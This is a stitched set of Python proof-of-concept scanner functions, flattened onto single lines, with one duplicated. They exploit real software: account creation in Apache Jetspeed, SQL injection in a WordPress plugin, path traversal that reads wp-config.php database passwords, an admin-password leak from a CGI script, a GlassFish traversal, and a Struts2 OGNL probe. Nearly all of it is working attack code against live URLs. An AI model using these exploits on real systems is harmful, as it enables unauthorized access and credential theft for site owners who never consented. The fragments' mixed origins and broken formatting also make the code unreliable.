def poc(url): if '://' not in url: if ':443' in url: url = 'https://' + url else: url = 'http://' + url url = get_domain(url).rstrip('/') user = randomString(6) password = randomString(6) url1 = url + '/jetspeed/services/usermanager/users/?_type=json' data1 = { 'name': user, 'password': password, 'password_confirm': password, 'user_name_given': 'foo', 'user_name_family': 'bar', 'user_email': '*****@*****.**', 'newrule': '' } try: requests.post(url1, data=data1, headers={'User-Agent': firefox}, timeout=10, verify=False) c = requests.post(url1, data=data1, headers={'User-Agent': firefox}, timeout=10, verify=False).content # response: org.apache.jetspeed.security.SecurityException.PRINCIPAL_ALREADY_EXISTS if 'PRINCIPAL_ALREADY_EXISTS' in c: if not ENABLE_EXP: return True else: return False except Exception, e: if not ENABLE_EXP: return False
def poc(url): target = get_entry(url) if not target: return False if CHECK_WAF and has_waf(target): return '[Uncertain,WAF detected!] ' + get_domain(target) data_temp = "page=1&galleryid=[P]&task=load_videos_content&perpage=20&linkbutton=2" # Content-Type needed headers = { 'User-Agent': loadfakeuseragent(), 'Content-Type': 'application/x-www-form-urlencoded' } try: r1 = requests.post(target, headers=headers, data=data_temp.replace('[P]', '-1 OR 1=1')) r2 = requests.post(target, headers=headers, data=data_temp.replace('[P]', '-1 OR 1=2')) except: return False if r1.status_code == r2.status_code == 200 and len(r1.content) != len( r2.content): return True return False
def poc(url): if '://' not in url: url = 'http://' + url payload = '/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php' target = get_domain(url).rstrip('/') + payload try: r = urllib2.urlopen(target, timeout=5).read() # cannot use requests here if "define('DB_PASSWORD'" in r and '@package WordPress' in r: return target except Exception, e: pass
def poc(url): if '://' not in url: url = 'http://' + url payload = '/wp-content/themes/bonkersbeat/lib/scripts/dl-skin.php' target = get_domain(url).rstrip('/') + payload try: r = urllib2.urlopen(target, data="_mysite_download_skin=../../../../../wp-config.php", timeout=5).read() if "define('DB_PASSWORD'" in r and '@package WordPress' in r: return target except Exception: pass return False
def poc(url): if '://' not in url: url = 'http://' + url payload = "/cgi-bin/readfile.cgi?query=ADMINID" target_url = get_domain(url) + payload try: r = requests.get(target_url, timeout=10) if 'var Adm_Pass1' in r.content: return target_url except Exception: pass return False
def poc(url): if '://' not in url: url = 'http://' + url url = get_domain(url) payload = '/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF' try: c = requests.get(url + payload, headers={'User-Agent': firefox()}, timeout=10).content except Exception: return False if 'Version' in c: return True return False
def poc(url, **kwargs): if kwargs.get('ip'): url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port') else: url = url timeout = 10 domain = get_domain(url) proxies = {'http': '127.0.0.1:9999'} headers = { "User-Agent": 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0' } ran_a = random.randint(10000000, 20000000) ran_b = random.randint(1000000, 2000000) ran_check = ran_a - ran_b parser = urlparse(url) if parser.path: _path_list = parser.path.replace('//', '/').strip('/').split('/')[-1] else: _path_list = 'index.action' url_list = iterate_path(url) for urls in url_list: url = urls + '/${%s-%s}/%s' % (ran_a, ran_b, _path_list) try: res = requests.get( url, timeout=timeout, headers=headers, allow_redirects=False, verify=False, ) if res.status_code == 302 and res.headers.get( 'Location') is not None and str( ran_check) in res.headers.get('Location'): urlLoca = res.headers.get('Location') res2 = requests.get(domain + urlLoca, headers=headers, timeout=6, allow_redirects=False, verify=False) if str(ran_check) in res2.text: result = "目标存在 Struts2-057, check url: %s" % url return result except: pass
def checkCDN(url): """ Detect if the website is using CDN or cloud-based web application firewall :param url: Target URL or Domain :return True / False """ url = 'http://' + url if '://' not in url else url url = get_domain(url) dest = 'http://ce.cloud.360.cn/' s = requests.session() data1 = _get_static_post_attr(s.get(dest).content) data1['domain'] = url s.post('http://ce.cloud.360.cn/task', data=data1) headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8' } s.post('http://ce.cloud.360.cn/Tasks/detect', data=data1, headers=headers) time.sleep(5) # 5 sec delay for nodes to detect data = 'domain=' + url + '&type=get&ids%5B%5D=1&ids%5B%5D=2&ids%5B%5D=3&ids%5B%5D=4&ids%5B%5D=5&ids%5B%5D=6&ids%5B%5D=7&ids%5B%5D=8&ids%5B%5D=9&ids%5B%5D=16&ids%5B%5D=18&ids%5B%5D=22&ids%5B%5D=23&ids%5B%5D=41&ids%5B%5D=45&ids%5B%5D=46&ids%5B%5D=47&ids%5B%5D=49&ids%5B%5D=50&ids%5B%5D=54&ids%5B%5D=57&ids%5B%5D=58&ids%5B%5D=61&ids%5B%5D=62&ids%5B%5D=64&ids%5B%5D=71&ids%5B%5D=78&ids%5B%5D=79&ids%5B%5D=80&ids%5B%5D=93&ids%5B%5D=99&ids%5B%5D=100&ids%5B%5D=101&ids%5B%5D=103&ids%5B%5D=104&ids%5B%5D=106&ids%5B%5D=110&ids%5B%5D=112&ids%5B%5D=114&ids%5B%5D=116&ids%5B%5D=117&ids%5B%5D=118&ids%5B%5D=119&ids%5B%5D=120&ids%5B%5D=121&ids%5B%5D=122&user_ip_list=' r = s.post('http://ce.cloud.360.cn/GetData/getTaskDatas', data=data, headers=headers) ips = re.findall('"ip":"(.*?)"', r.content) ans = list(set(ips)) msg = url if not len(ips): msg += ' [Target Unknown]' return msg msg += ' [CDN Found!]' if len(ans) > 1 else '' msg += ' Nodes:' + str(len(ips)) msg += ' IP(%s):' % str(len(ans)) + ' '.join(ans) return msg
def poc(url): if '://' not in url: if ':443' in url: url = 'https://' + url else: url = 'http://' + url url = get_domain(url).rstrip('/') user = randomString(6) password = randomString(6) url1 = url + '/jetspeed/services/usermanager/users/?_type=json' data1 = { 'name': user, 'password': password, 'password_confirm': password, 'user_name_given': 'foo', 'user_name_family': 'bar', 'user_email': '*****@*****.**', 'newrule': '' } try: requests.post(url1, data=data1, headers={'User-Agent': firefox}, timeout=10, verify=False) c = requests.post(url1, data=data1, headers={ 'User-Agent': firefox }, timeout=10, verify=False).content # response: org.apache.jetspeed.security.SecurityException.PRINCIPAL_ALREADY_EXISTS if 'PRINCIPAL_ALREADY_EXISTS' in c: if not ENABLE_EXP: return True else: return False except Exception, e: if not ENABLE_EXP: return False